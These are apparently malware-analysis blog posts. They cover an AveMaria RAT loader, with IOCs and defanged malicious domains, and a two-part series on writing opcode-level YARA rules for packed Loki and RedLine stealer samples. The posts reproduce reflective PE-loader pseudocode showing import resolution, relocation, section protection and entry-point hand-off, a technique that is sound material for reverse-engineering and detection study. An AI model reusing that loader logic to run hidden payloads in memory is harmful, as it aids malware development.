    Figure 27. Reconstructed image layout after section mapping, where the loader has copied headers and section contents into their respective virtual addresses, producing an in-memory structure that closely mirrors how the Windows loader would normally map the executable.

    Resolve Imports

    The loader processes the Import Address Table (IAT).

    Steps

    1. load required DLL
    2. resolve imported functions
    3. write addresses into IAT
    for each import_descriptor:
    dll = LoadLibrary(import_descriptor.DLLName)
    for each thunk:
    if import by ordinal:
    func = resolve_ordinal(dll)
    else:
    func = GetProcAddress(dll, function_name)
    write func into IAT

    Figure 28. Import resolution routine reconstructing the IAT by loading each required DLL and resolving imported functions by name or ordinal before writing the resulting addresses into the mapped image.

    Applying Relocations

    If the image cannot be loaded at its preferred base address, the loader adjusts internal addresses accordingly.

    delta = allocated_image - PE_HEADER->OptionalHeader.ImageBase
    for each relocation_entry:
    *(target_address) += delta

    Figure 29. Relocation processing adjusts embedded addresses using the calculated base delta, ensuring all internal references point to the correct locations within the newly mapped image.

    Setting Section Protections

    The loader then assigns appropriate memory permissions to each section based on its characteristics.

    if (ntHeaders->FileHeader.NumberOfSections)
    {
    IMAGE_SECTION_HEADER *section =
    (IMAGE_SECTION_HEADER *)((char *)&ntHeaders->OptionalHeader.FileAlignment + v42);
    for (; v41 != 0; section++, v41--)
    {
    DWORD chars = section->Characteristics;
    DWORD size = section->SizeOfRawData;
    DWORD rva = section->VirtualAddress;
    DWORD sectionProtect;
    DWORD protect;
    if (size == 0)
    continue;
    bool isRead = (chars & IMAGE_SCN_MEM_READ) != 0;
    bool isExecute = (chars & IMAGE_SCN_MEM_EXECUTE) != 0;
    bool isWrite = (chars & IMAGE_SCN_MEM_WRITE) != 0;
    if (!isExecute)
    {
    if (isRead)
    sectionProtect = isWrite ? PAGE_READWRITE : PAGE_READONLY;
    else
    sectionProtect = isWrite ? PAGE_WRITECOPY : PAGE_NOACCESS;
    }
    else
    {
    if (isRead)
    sectionProtect = isWrite ? PAGE_EXECUTE_READWRITE : PAGE_EXECUTE_READ;
    else
    sectionProtect = isWrite ? PAGE_EXECUTE_WRITECOPY : PAGE_EXECUTE;
    }
    protect = (chars & 0x04000000)
    ? (sectionProtect | PAGE_NOCACHE)
    : sectionProtect;
    if (!VirtualProtect(
    Actual_ImageBase + rva,
    size,
    protect,
    &oldProtect))
    {
    return 0;
    }
    }
    }
    EntryPoint_Ptr =
    (void (__stdcall *)(int, int, int))
    (Actual_ImageBase + ntHeaders->OptionalHeader.AddressOfEntryPoint);
    ZwFlushInstructionCache(v42, reloc, -1, 0, 0);
    EntryPoint_Ptr(Actual_ImageBase, 1, 1);

    Figure 30. Pseudocode representation of the relocation routine showing how each relocation entry is processed to patch absolute addresses using the calculated base delta; once relocations are applied, execution flow reaches the ZwFlushInstructionCache call before transferring control to the reconstructed payload’s entry point.

    Cache Flush and Entry Point Invocation

    Before transferring control to the reconstructed payload, the loader flushes the CPU instruction cache to ensure that the processor executes the freshly written code from the newly mapped image. Once the cache is synchronized, the loader resolves the executable’s entry point using the AddressOfEntryPoint field from the PE optional header and invokes it directly, as illustrated in Figure 28.

    Optional Export Invocation

    After the mapped module’s entry point is executed, the loader optionally performs an additional export lookup if a non-zero exportHash is provided. It parses the PE’s export directory, iterates through exported function names, and computes a ROR13-style hash for each. When the calculated hash matches the supplied value, the loader resolves the corresponding function address and invokes it with the provided arguments. This mechanism allows the loader to trigger a specific exported routine without embedding plaintext function names in the loader itself.

    if (exportHash != 0)
    {
    exportDir = imageBase + ExportDirectory;
    for each exported_function_name
    {
    hash = ROR13(name);
    if (hash == exportHash)
    {
    func = imageBase + function_address;
    func(exportArg1, exportArg2);
    break;
    }
    }
    }

    Figure 31. Pseudocode illustrating the optional export invocation routine, where the loader scans the export table, hashes each function name, and executes the export whose hash matches the supplied value.

    C2 Identification

    To identify the command-and-control endpoint, the first step is to place a breakpoint at the entry point invocation of the mapped PE, where the shellcode loader finally transfers execution to the reconstructed implant. Once execution lands inside the payload, the loaded modules can be inspected to understand which capabilities the malware is preparing to use. In this case, the presence of ws2_32.dll quickly points toward networking activity. From there, attention shifts to common DNS resolution routines such as getaddrinfo, which are typically used to resolve attacker-controlled domains before establishing outbound connections.

    Since the hostname is usually supplied as an argument to this API, placing a breakpoint on getaddrinfo allows the analyst to capture the domain directly when the function is invoked. When execution reaches this breakpoint, the domain string passed to the resolver becomes visible, revealing the potential C2 hostname used by the implant.

    For the purpose of this analysis, we will leave the investigation here. A deeper exploration of how the malware communicates with its C2 — including connection setup, protocol usage, and task handling — deserves its own dedicated analysis, which we will examine in a future post.

    Figure 32. The loader flushes the instruction cache and pivots execution to the reconstructed PE entry point, handing control from the shellcode stub to the in-memory payload.

    Figure 33. With ws2_32.dll mapped, the payload locates getaddrinfo, preparing the networking stack required for outbound C2 communication.

    Figure 34. Execution enters ws2_32.getaddrinfo, resolving the embedded hostname before the malware establishes its network channel.

    Figure 35. IDA pseudocode captures the moment the payload resolves its embedded domain through getaddrinfo, converting the hostname into a reachable C2 address.

    Indicators Of Compromise (IOCs)

    File Hashes

    Initial Loader (.HTA)
    MD5: 6114a230ccdb77219c67c47e054f881a

    Delivery Container (ISO)
    MD5: 62655c77982dbea9bfd30d0004862228

    Shortcut Dropper (.LNK)
    MD5: 2828f49cde16e65a1bee0c5c44aed8cc

    Final Payload (AveMaria RAT)
    MD5: 3bc9680077b50ad074e607b3ba700edc

    Network Indicators

    Payload Distribution

    sgtmarkets[.]com/mt4.exe
    Used to retrieve the AveMaria payload.

    sgtmarkets[.]com/h.hta
    HTA loader used in the early execution stage.

    Command-and-Control

    mt4blog[.]com
    Observed during C2 communication with the AveMaria RAT.

    References

    Zscaler ThreatLabz – Dynamic Approaches Seen in AveMaria’s Distribution Strategy – https://www.zscaler.com/blogs/security-research/dynamic-approaches-seen-avemaria-s-distribution-strategy

  • Part 2: When Strings Disappear: The Key Is the Signature

    Author: Valli-Nayagam Chokkalingam

    Contents

    The Algorithm Is Not the Detection

    In Part 1, everything lived inside custom packer logic: not “malware strings,” not obvious config blobs—just the boring reality of a loader trying to stay unreadable. High entropy, dead strings, and a small decryptor sitting in the middle like a locked door. Part 2 stays in that same lane, but shifts the focus from handcrafted XOR/NOT tricks to known decryption patterns that packers love to reuse—RC4-style state shuffles, TEA/XTEA-looking round loops, tiny block mixers that scream “decrypt me” the moment you see them in IDA. The trap is that recognizing an algorithm isn’t detection by itself. RC4 or TEA showing up in a binary doesn’t make it malicious—it just means someone used crypto, and plenty of clean software does too. What actually matters is how the packer uses it: the fixed constants, the hardcoded key material, the staging around the routine, and the repeatable byte-level fingerprints that survive even when the encrypted payload changes. This part is about writing YARA for that reality—where the algorithm is only the starting point, and the real signal is the custom glue around it.

    Detect It Easy: Static Analysis First

    Before IDA, before control-flow graphs, before chasing logic that may not even be real yet, the first stop is Detect It Easy. Not because it “detects malware.” Because it detects deception. In this case, the target is a Loki Stealer sample pulled from VirusShare:

    SHA256: 0b416446c098203de4b550714e69a2715ed1c2127a4db54f3d46b47cd2d9a2be

    Packed samples don’t win by being clever—they win by being unreadable. And the fastest way to lose time is to start reversing a wrapper while believing it’s the payload.

    DIE makes that boundary obvious. The file shows up as a PE32 (32-bit GUI) compiled with Microsoft tooling—normal enough on the surface. But the real message is the heuristic flag:

    (Heur)Packer: Compressed or packed data — .text section compressed

    That line is a warning label. .text isn’t supposed to be compressed. .text is supposed to be instructions. When it looks packed, it’s rarely “optimization.” It’s almost always staging: a small loader sitting in front, hiding the real code behind an unpack step.

    Figure 1. Detect It Easy confirms this Loki Stealer sample is packed—.text is compressed, meaning the “real code” is still hiding behind a loader stage.

    The Strings view backs it up in a quiet way. No domains. No config. No obvious paths. No flashy indicators. Just Windows APIs—the boring ones—the kind that show up when a binary doesn’t want to carry personality on disk:

    GlobalAlloc, VirtualAlloc, VirtualProtect

    None of these are malicious on their own. Clean software uses them constantly. But together they sketch the familiar outline of a loader: allocate memory, rebuild something into that buffer, flip protections so it can execute, and then hand off control. The absence of “malware strings” isn’t a gap here—it’s the design.

    This is why static triage matters before deeper reversing. DIE isn’t the answer. It’s the direction. It doesn’t say what the payload does. It says the payload isn’t visible yet—and the only stable surface is the glue that survives every rebuild.

    Figure 2. The Strings tab stays intentionally empty of personality—just loader-grade APIs like GlobalAlloc, VirtualAlloc, and VirtualProtect, hinting at memory staging rather than readable intent.

    Follow the Memory: GlobalAlloc as the First Breadcrumb

    Once the file screams “packed,” the next step isn’t to read code like a story. It’s to follow infrastructure—the boring APIs the stub can’t live without. And memory allocation is always one of the first tells, because unpacking needs somewhere to build the real payload. From there, the natural next move is simple: open it in IDA and start tracing those allocation calls into the unpacking flow.

    In the Imports view, GlobalAlloc stands out immediately. Not because it’s rare, but because it’s useful. A loader doesn’t allocate memory for fun—it allocates memory because something is about to be staged, decrypted, decompressed, or reshaped into execution-ready bytes.

    Figure 3. The import table exposes GlobalAlloc—a clean pivot into the unpacking flow.

    So instead of guessing where the unpacker lives, the workflow becomes mechanical:

    pick the allocation API → jump to XREFs → land inside the staging logic.

    Following the cross-references to GlobalAlloc drops straight into a tiny helper routine: sub_403220. One clean call, one returned buffer, one pointer getting saved. No payload logic, no drama—just setup. That’s exactly what it is, so sub_403220 gets renamed to GlobalAllocWrapper.

    Figure 4. The GlobalAlloc XREF is the first crack in the wrapper—pointing straight into sub_403220.

    Figure 5. A one-liner allocator stub: GlobalAlloc in, pointer out—nothing but memory prep for the next stage.

    Cross-referencing GlobalAllocWrapper leads to 0x403240, the routine that actually uses the allocated memory. This is where “packed” stops being a label and starts being behavior—staging bytes into memory in a way that only makes sense if the next step is execution. Right after allocation, the code flips the region into an executable-ready state with VirtualProtect(lpAddress, dwSize, 0x40, …), and then a tight for loop walks byte-by-byte, copying data from an embedded blob (dword_2B92E24 + 72475) straight into that buffer. No readable intent, no strings coming back to life—just the next stage being rebuilt in memory, one byte at a time. That’s why 0x403240 gets renamed to UnpackPayloadToExecutableMemoryAndRun. The random-looking API calls inside the loop (GetModuleHandleW, SetColorAdjustment, CreateMemoryResourceNotification, etc.) aren’t “features,” they’re junk API padding: cheap clutter thrown in to break patterns, confuse analysts, and make the unpacker look busier than it really is.

    Figure 6. Cross-referencing GlobalAllocWrapper leads straight into 0x403240—the real staging routine where unpacking starts to take shape.

    Figure 7. Inside 0x403240, the loader flips the allocated region to RWX (VirtualProtect 0x40) and reconstructs the next stage byte-by-byte in a tight copy loop.

    And the placement seals it: UnpackPayloadToExecutableMemoryAndRun is the last call made inside WinMain. The program doesn’t end with application logic. It ends with a hand-off. The stub runs just long enough to allocate memory, rewrite it, mark it executable, and pass execution forward into whatever it just assembled.

    Figure 8. XREFs pin UnpackPayloadToExecutableMemoryAndRun directly back to WinMain

    Figure 9. WinMain doesn’t do much else—its final move is calling UnpackPayloadToExecutableMemoryAndRun, the hand-off into the real stage.

    Identifying the Decryption Logic

    The staging routine (UnpackPayloadToExecutableMemoryAndRun) already did the loud part: allocate memory, flip it to RWX, and rebuild a blob into lpAddress. That answers the where. The next question is the one that actually matters:

    what happens to that buffer after it’s built?

    That’s where lpAddress becomes more than a variable—it becomes a trail.

    Cross-referencing lpAddress shows it being pulled into another routine (sub_4030E0), where the pointer is treated like a working buffer: v1 = (char *)lpAddress; and then processed in a loop. This is the moment the sample stops “copying bytes” and starts doing something to them.

    And right in the middle of that loop, the real pivot appears: a call to sub_402F00(v1), repeated as the pointer moves forward (v1 += 8). That stride isn’t accidental. Eight bytes at a time is block territory—exactly the size you’d expect when something is being transformed in 64-bit chunks instead of raw stream decoding.

    Figure 10. XREFs to lpAddress reveal where the unpacked buffer gets consumed next—leading straight into the routine that starts transforming it, not just storing it.

    Figure 11. sub_4030E0 grabs lpAddress, walks it in 8-byte steps, and funnels each block into sub_402F00—the first real “decrypt this” pivot.

    Once inside sub_402F00, the shape is unmistakable. Shifts. XORs. Adds. The same variables being mixed again and again. A constant-looking shift count (v10 = 5) driving repetitive work. It reads like a block-mixing routine because that’s what it is: the kind of tight arithmetic loop packers love because it’s small, fast, and doesn’t need any strings to function.

    That’s where “TEA-like” stops being a vibe and becomes structure. The routine doesn’t need to be a perfect textbook implementation to give itself away—the round posture is there: repeated mixing, XOR chaining, shift-heavy math, and a consistent 8-byte block stride. TEA-family logic can exist in clean software too, but in a packed loader pipeline like this, it’s not decoration. It’s the engine.

    Figure 12. Inside sub_402F00, the decryption shows its shape—shift/XOR/add mixing repeated in tight rounds, the kind of math loop packers can’t hide behind.

    Then the constant shows up.

    0x9E3779B9.

    That number isn’t random filler. It’s one of those crypto fingerprints that refuses to stay quiet—the golden ratio constant used across TEA-style designs. The moment it appears alongside the shift/XOR mixing pattern, the routine stops being “maybe decryption” and becomes extremely specific. Strings can disappear. Imports can be reshuffled. Junk APIs can be sprayed everywhere. But the math still has to work, and constants like this tend to survive rebuilds untouched. So the decryption logic isn’t hiding in some giant function with a friendly name.

    Figure 13. sub_402F00 hardcodes 0x9E3779B9—the TEA/XTEA “golden ratio” constant that quietly fingerprints the decryptor.

    Figure 14. A quick search maps 0x9E3779B9 back to TEA—the golden ratio constant that gives the loop away.

    At that point, verification becomes boring—in a good way. The same constant and mixing shape shows up cleanly in public TEA reference code (for example, the implementation in tea.c here – https://github.com/coderarjob/tea-c/blob/master/tea.c). And if the goal is to sanity-check fast instead of debating patterns by eye, tools like FindCrypt can do the constant-hunting automatically—findcrypt.py will label common crypto constants and point straight at the routine addresses it matches.

    Figure 15. A public TEA reference (tea.c) shows the same 0x9E3779B9 delta and shift/XOR mixing pattern

    But that familiarity is exactly the trap. TEA-style loops aren’t rare, and writing a detection rule around “TEA exists” is the fastest way to gift yourself false positives. So the focus shifts to what isn’t generic: the custom glue around the algorithm—especially the parts the author had to choose. In this case, that means the key material and the way it’s staged and referenced. The algorithm can be common. The key almost never is.

    sub_4030E0 is renamed to TEA_ProcessBuffer_8ByteBlocks, and sub_402F00 is renamed to TEA_LikeDecryptBlock to reflect the TEA-style decryption flow.

    Identifying the Key

    Once you’ve seen 0x9E3779B9 sitting inside a 32-round shift/XOR/add loop, the algorithm stops being a debate. It’s TEA-family math. Close enough that the function could change clothes, switch variable names, sprinkle junk calls, and still keep the same posture.

    But that’s also where the real problem starts.

    Because detecting “TEA exists” is worthless on its own. TEA-like loops show up in clean software, in academic code, in legitimate packers, and in every copy-paste loader written by someone who spent ten minutes on GitHub. The algorithm is reusable. The implementation pattern is reusable.

    The key isn’t.

    And that’s the shift: once the decryptor is identified, the next thing you hunt is the part the author actually had to choose.

    The key isn’t passed in. It’s baked into globals.

    Textbook TEA hands you a clean uint32_t k[4]. This sample doesn’t. It hides the key material where analysts hate looking: globals that feel like boring state.

    Figure 16. The decryptor loads its 4-DWORD key straight from global memory (dword_425CA8/425CAC/425CB0/425CB4)—the moment the routine stops looking generic and starts revealing the fingerprint behind the TEA-style loop.

    Right at the top of the routine you can see the four values getting pulled in:

    dword_425CA8

    dword_425CAC

    dword_425CB0

    dword_425CB4

    They get loaded into working variables once, then used repeatedly inside the round logic.

    Figure 17. Inside the round loop, the decryptor starts mixing the renamed key variables (v2, v13, v16, v15 → Key_Dword0–Key_Dword3) into the shift/XOR/add math that drives each 8-byte block transformation.

    Once those four values are found, everything gets simpler.

    You don’t need to obsess over whether the implementation is TEA, XTEA, “TEA-ish,” or a custom remix. That argument dies the moment you realize you’re not trying to detect crypto.

    You’re trying to detect ownership.

    And keys are ownership.

    Most samples can borrow an algorithm. Most samples don’t share the same 128-bit key schedule sitting in .data.

    Figure 18. Four hardcoded DWORDs in .data (dword_425CA8–425CB4)—the key material the decryptor is built around.

    Writing the YARA Rule

    Figure 19. YARA rule detecting the TEA-like decryptor stub via embedded key material, delta constant, and shift/mix opcode patterns (left/right shifts).

    Let’s look at how this TEA-stub rule is structured. It’s not trying to fingerprint a whole function end-to-end. It’s doing something more practical: pinning down the few things a TEA-like decryptor can’t hide without rewriting itself. This rule is built around three deliberate checkpoints:
    1) The embedded 16-byte key blob
    2) The TEA delta constant (0x9E3779B9)
    3) The shift-mixer fingerprints (<<4 and >>5) — with a proximity window so the shifts aren’t “anywhere in the binary”, they’re near the crypto logic

    That’s the difference between a rule that “matches something with bitshifts” and a rule that matches a decryptor.

    $keyblob (the real identity)

    The strongest anchor in this rule is the key material.
    16 85 9E 04 DF 08 EB C1 38 39 CE 43 86 D2 0F 8D
    Those are not “random bytes” in the file. In the context of TEA-style routines, this is the part that matters most: the key is the author’s fingerprint. TEA/XTEA as algorithms are boring — they exist everywhere. But this specific key does not. That’s why the rule doesn’t just match $k0 $k1 $k2 $k3 individually — it matches them as one contiguous $keyblob. Contiguity matters because it reduces accidental collisions and makes it harder for trivial re-ordering to bypass. If the decryptor is recompiled, the stack frame changes. If the decryptor is optimized, registers change. But that key blob? It usually stays exactly the same unless the operator rotates it. So in practice: $keyblob is your “who”.

    $delta (the TEA tell)

    TEA-like mixing almost always drags the delta constant into the routine:
    B9 79 37 9E => 0x9E3779B9 (little endian)
    This delta is a recognizable artifact of the TEA family. It’s not “proof” by itself — constants can appear anywhere — but when it’s present alongside a hardcoded 16-byte key it stops being random and starts being intent. That’s why this rule treats $delta as a required anchor rather than a bonus string.
    In practice: $delta is your “what family”.

    $shl4_* and $shr5_* (the mixer shape)

    TEA mixing patterns commonly use:
    (v << 4) (v >> 5)
    That exact “4 and 5” pairing shows up so often that it becomes a shape, not just an instruction.
    But here’s the nuance – If we only matched C1 E0 04 (shl eax,4) and C1 EE 05 (shr esi,5), it would be brittle. Different builds choose different registers.

    So the rule expands that into register-agnostic families:
    C1 E? 04 for shl r32,4
    C1 E? 05 for shr r32,5
    That’s why you see $shl4_0 .. $shl4_7 and $shr5_0 .. $shr5_7. Same intent. Different register choices. Still caught. In practice: the shifts are your “how it mixes”.

    Proximity window (where the rule becomes “crypto-aware”)

    This is the part that upgrades it from “pattern matching” to “context matching”. The rule doesn’t just require:
    one shl ?,4
    one shr ?,5
    It requires that these shifts occur near the delta constant:
    @delta ± 0x400 bytes
    That constraint is doing a lot of heavy lifting, because without it those bitshifts could be coming from hash routines, bitfield parsing, bitmap operations, compression, UI rendering code—basically anything. But when the shifts show up close to TEA delta, it strongly suggests you’re looking at the TEA-like round logic area, not random code elsewhere. This is what keeps the rule behavioral, not accidental.

    Testing the Rule

    Before this rule goes anywhere near a real scan, the first check is always noise: does it light up on clean software? The quickest sanity pass is a VirusTotal grep-style sweep using the hard anchors from the rule — the 16-byte key blob, the TEA delta (0x9E3779B9), and the TEA-like shift mixer hints (shl 4 / shr 5). If the search stays quiet (positives: 0 or close), it’s a strong sign the pattern isn’t just matching generic compiler output.

    After that, testing moves to Retrohunt (same workflow as Part 1): run the rule against a goodware-biased corpus for restraint, then against the default corpus to see whether it surfaces related binaries.

    We’ll stop here for now. Part 3 will look at what happens when imports disappear too — API names replaced with hashing routines, and everything resolved at runtime just to stay unreadable.

    References

    TEA C Implementation – https://github.com/coderarjob/tea-c

    YARA Documentation – https://yara.readthedocs.io/en/latest/

    VirusShare – https://virusshare.com/

  • Part 1: When Strings Disappear: Rethinking YARA at the Opcode Level

    Author: Valli-Nayagam Chokkalingam

    Most YARA rules start with strings. This post looks at what’s left when strings disappear—and how detection shifts closer to execution itself.

    The focus here is on how YARA rules are reasoned about, not to provide production-ready signatures or drop-in detection rules.

    Contents

    What YARA Is (and What It Isn’t)

    YARA is a pattern-matching tool. It scans data — files, memory regions, or raw byte streams — and checks whether specific patterns are present. Those patterns are defined explicitly by the analyst. There’s no inference, no behavior tracking, and no execution context unless you deliberately build it into the rule.

    That simplicity is both the strength and the limitation. YARA works well when something stable exists to anchor on: reused code, recognizable strings, or consistent structures. Where it struggles is when those artifacts are deliberately minimized, transformed, or never exist in a static form at all. Understanding YARA starts with accepting that boundary. It’s not a behavioral detector — it’s a lens, and everything that follows depends on what remains visible through it.

    Figure 1. A simple string-based YARA rule relying on recognizable ransom note text, illustrating the traditional starting point for static detection.

    Where String-Based Detection Starts to Fail

    Figure 1 shows a familiar starting point: a YARA rule built around plaintext ransom note strings. This approach works when those strings exist in a form that can be scanned on disk. Many samples still fit that model, which is why string-based rules remain common and often effective.

    The problem is that those strings are also the easiest thing to remove. Packing alone is enough to make them disappear from static analysis. Even without a full packer, simple string encryption, runtime decoding, or stack-based construction is sufficient to break disk-level matching. Once the binary no longer carries readable text, the rule has nothing to anchor on.

    The same applies to imports. When APIs are resolved dynamically—through hashing or manual lookup—the import address table no longer reflects what the program will actually call. From a static scanner’s perspective, both the strings and the intent are gone, even though execution behavior remains unchanged.

    In-memory scanning can recover some of that visibility, but it comes with tradeoffs. Memory-wide YARA scans are expensive, noisy, and difficult to run continuously at scale. They also depend on timing: the artifact has to exist in memory long enough to be seen. Short-lived decoding routines or transient strings can still slip through.

    At that point, the limitation isn’t YARA itself. It’s the assumption that detection starts with readable artifacts. As soon as those artifacts stop existing on disk, string-based detection stops being a reliable first step.

    Figure 2. Comparison of an unpacked and packed Hello World executable, showing how simple packing is enough to remove readable string artifacts from disk.

    From Source Code to Opcodes

    Source code is written for people. It explains intent, names things clearly, and makes sense at a glance. None of that is what actually runs. Once the compiler is done, the program exists only as instructions the CPU can execute.

    Figure 3 shows that shift in a very simple way. A small Hello World program in C is easy to follow at the source level. After compilation, that view disappears. What remains is assembly: individual instructions that tell the processor exactly what to do—move data, prepare arguments, call a function, return control.

    At that level, everything is reduced to opcodes and operands. The opcode is the instruction itself—move this, call that, jump here. The operands are the values or locations the instruction works on: registers, memory addresses, constants. Together, they form the instruction stream the CPU steps through one operation at a time.

    Strings tend to stand out during analysis because they’re readable, but they’re not essential. They’re just data sitting alongside the code. The instruction stream is different. Whether a binary is packed, encrypted, or stripped down, those opcodes still have to execute to make anything happen.

    That’s the layer that survives. When readable artifacts fade away, execution doesn’t. What’s left is the flow of instructions—opcodes acting on operands—that carries the program forward, regardless of how much effort went into hiding everything else.

    Figure 3. A simple C Hello World program alongside its compiled assembly, illustrating how readable source code is reduced to executable instructions.

    Looking Closer at the Instruction Bytes

    We’ll stick to the first three instructions that run inside main from the Hello World example in Figure 3. Not the whole function. Just where execution actually starts. Each one is pulled out on its own in Figures 4, 5, and 6.

    By this point, there’s no source code left. No structure to lean on. The CPU is just walking bytes. Each instruction is a short sequence, read as a unit, then executed. That’s it.

    Figure 4. The first instruction executed inside main, adjusting the stack pointer to establish a usable stack frame.

    This instruction exists to move the stack pointer.

    48 is the prefix that makes this a 64-bit operation. Without it, rsp wouldn’t be involved at all.

    83 selects a subtraction that uses a small constant.

    EC is where the target register is encoded. In this case, it resolves to rsp.

    28 is the value. 0x28 gets subtracted from the stack pointer.

    No locals. No memory access. Just the stack pointer being nudged into place so the function can run.

    Figure 5. An instruction computing the address of the string and placing it into a register for use as a function argument.

    This one prepares the argument for the call that follows.

    Same 48 prefix. Same 64-bit context.

    8D marks this instruction as lea. That matters. Nothing is being read here. Only the address of the string “Hello World!\n” is loaded into rcx.

    0D encodes the destination register and the addressing mode. rcx, RIP-relative. The remaining bytes form the displacement. Added to the instruction pointer, they land on the string “Hello World!\n“.

    The string itself isn’t touched. Only the address ends up in rcx. That’s enough.

    Figure 6. A relative call instruction transferring execution to another routine without relying on symbols or absolute addresses.

    This is the handoff.

    E8 identifies the instruction as a call.

    The bytes after it are just an offset. Signed. Relative. No absolute address anywhere.

    At runtime, the CPU adds that offset to the current instruction pointer and jumps. A return address gets pushed. Execution continues within the function sub_140001010 which is responsible for printing the string to the console.

    What Detection Anchors On When Artifacts Are Gone

    When strings stop being reliable, the remaining signals come from execution itself. Code still has to unpack, decrypt, or resolve what it needs before it can do anything useful. That work leaves structure behind, even when everything else is stripped away.

    Figure 7 groups those structures into a few broad buckets—custom packers, known algorithms, and hashing logic—before we step through each one individually.

    Figure 7. Detection patterns that persist after strings disappear.

    Custom Packer Logic: String Decryption Rule

    For this post, I’m using a RedLine Stealer sample from VirusShare.
    SHA-256: 00da14d8bbe2c85a04314b0ac40c13ebb67fe6693af8e786e63a2c6f6a428b00.

    Opening the sample in Detect It Easy, the overall picture becomes clear almost immediately. The binary identifies as a standard PE32, built with Visual C++, but that familiarity stops there. The heuristic flags tell the real story: compressed or packed data, elevated entropy, and a resource section doing more work than it should. There’s even a loose heuristic hint toward .NET Reactor–like behavior, but with no managed metadata to back it up—just import patterns that resemble what Reactor-protected samples often expose, making it a cue to dig deeper rather than a conclusion to trust. At best, this suggests some custom, Reactor-inspired techniques in play rather than a clean, off-the-shelf protector.

    Figure 8. The file presents as a packed PE—high entropy, compressed resources, and little else to work with.

    The entropy view reinforces that suspicion. The PE header and a couple of standard sections sit where you’d expect them, with relatively low entropy. But both the .text section and, more noticeably, the .rsrc section spike sharply. The resource section in particular stays near the upper end of the scale across its entire range—consistent with compressed or encrypted content rather than icons, dialogs, or version metadata. Whatever this binary is carrying, it isn’t meant to be readable on disk.

    Figure 9. .text carries more entropy than expected, alongside a dense .rsrc, pointing to logic and data deliberately blurred at rest.

    That expectation carries over into the strings view. Scanning the binary surfaces almost nothing of value. There are no configuration strings, no URLs, no user-facing messages, no obvious markers that could anchor a meaningful signature. What does appear are a small set of import-related API names—exactly the strings the Windows loader requires to resolve imports at runtime. Everything else is either short, high-entropy fragments or completely nonsensical output from the packed data. From a static perspective, the binary offers no stable plaintext indicators beyond what’s structurally unavoidable.

    Figure 10. The strings view offers little beyond imported API names; everything else is noise or encrypted.

    With static inspection tapped out in Detect It Easy, the next step is obvious: load the binary into IDA and follow execution instead of artifacts. Right at the top of main, before anything meaningful happens, execution funnels into sub_401650. That function runs immediately, reconstructing data byte-by-byte and handing the result back to the caller. In the debugger, the payoff is clear—the decrypted output resolves to Cor_Enable_Profiling, a string that never appears in plaintext on disk.

    Figure 12. Execution drops straight into sub_401650 at the very start of main.

    Figure 13. Stepping through the code shows the same routine decrypting data in memory at runtime, confirming the strings never exist in plaintext on disk

    That placement matters. A decryption routine sitting at the very start of main isn’t incidental—it’s foundational. At this point, the question stops being what strings exist and shifts to how they’re being rebuilt, and what that reconstruction logic looks like under the hood.

    Looking deeper into sub_401650, it’s immediately clear what this isn’t. There’s no key schedule, no state array, no rounds, no diffusion step that even vaguely resembles RC4, AES, or any standard algorithm. Nothing is iterated. Nothing evolves. Each byte is touched once, transformed, and discarded.

    The logic is blunt and handcrafted. A fixed 32-byte buffer goes in. A fixed sequence of XORs and a single NOT is applied. The constants are embedded directly in the instruction stream—no derivation, no reuse, no abstraction.

    That custom shape is exactly what gives the routine its detection value. Even when strings disappear, this logic remains stable and specific to the sample, making it a strong candidate for a YARA rule anchored in opcode.

    Figure 14. sub_401650 performing fixed, byte-by-byte decryption using hard-coded constants—custom logic, not a standard cipher.

    Figure 15. Cross-references show sub_401650 called repeatedly, decrypting multiple embedded strings across main.

    Figure 16. Direct Python clone of sub_401650 for string decryption.

    Finding a distinctive routine is only the first step. Once sub_401650 stands out as something worth anchoring on, the next question is restraint. A good rule doesn’t just match—it knows when not to. You don’t want this logic firing on clean binaries that happen to use a few XORs, and you don’t want it so narrow that it misses sibling samples built by the same actor. The goal is balance: tight enough to avoid noise, loose enough to catch the family and its close variants that reuse the same string-hiding approach.

    That’s also where performance starts to matter. YARA doesn’t run in a vacuum. In production, every rule competes for CPU time, memory, and scan budget. The more work a rule does, the more selective it needs to be about when that work runs. This is why a raw code pattern is rarely left alone. You layer it with cheap filters first—file size bounds, PE characteristics, section counts, presence or absence of a security directory, even coarse-grained signals like import hash or compiler fingerprints. You can narrow further by checking how execution begins: whether main follows a familiar setup before decryption kicks in, or whether certain code bytes consistently appear just ahead of the routine.
    All of that isn’t about weakening the detection. It’s about shaping it. The decryption logic remains the core signal, but everything around it helps decide when that signal is worth evaluating. That’s how a rule moves from “interesting” to usable—specific enough to matter, efficient enough to survive real-world scanning.

    For this post, though, that full tuning exercise stays out of scope. The focus here isn’t on squeezing every last microsecond out of a production rule or debating scan-time tradeoffs. It’s about understanding what makes a piece of code worth anchoring on in the first place, before performance and deployment concerns enter the picture.

    The next step, then, is to get closer to the bytes themselves. To do that, you need to look past pseudocode and into the actual opcode stream. In IDA, that means switching on opcode bytes in the disassembly view—so each instruction shows not just what it does, but how it’s encoded. That’s the level YARA ultimately reasons about. Once those bytes are visible, the decryption routine stops being an abstract idea and becomes a concrete sequence you can measure, compare, and eventually express as a rule.

    Figure 17. Opcode bytes exposed beside each instruction — the raw material for YARA beyond strings.

    Figure 18. Sample YARA rule illustrating opcode-level detection of a custom string decryptor routine

    Let’s look at how the rule is structured. The logic isn’t spread evenly across the function—it’s anchored around a few deliberate checkpoints. We’ll walk through the $head, $m1, $m2 and $tail sequences in turn, and why each one was chosen to represent intent rather than incidental compiler noise. We’ll also unpack the use of ?? wildcards—where flexibility is intentional, and where the bytes matter enough that they’re locked down.

    $head

    The opening bytes are not interesting because they set up a stack frame—they’re interesting because of what follows immediately after. The routine pulls a pointer from the stack and starts reading one byte at a time using movzx. That’s the first signal: byte-wise handling, not block crypto.

    The paired XORs with hardcoded constants (A3, 54) matter because they’re embedded directly into the instruction stream. There’s no key material, no loop-driven derivation, no state carried forward. Each byte is treated in isolation. The single not cl stands out even more. Mixing a NOT into an otherwise XOR-only flow is uncommon and gives this routine a shape that’s easy to recognize and hard to accidentally reproduce.

    $m1 & $m2

    Instead of matching every transformation, the rule samples a few XOR pairs from the middle of the routine. Constants like B5/87 and 7B/0F aren’t special in a cryptographic sense—they’re special because they’re arbitrary. They exist only because the author chose them.

    Requiring multiple such pairs makes the rule resilient. One XOR constant could collide with benign code. Several, in a fixed order, almost never do. This keeps the rule wide enough to catch variants using the same routine, but narrow enough to avoid random matches.

    $tail

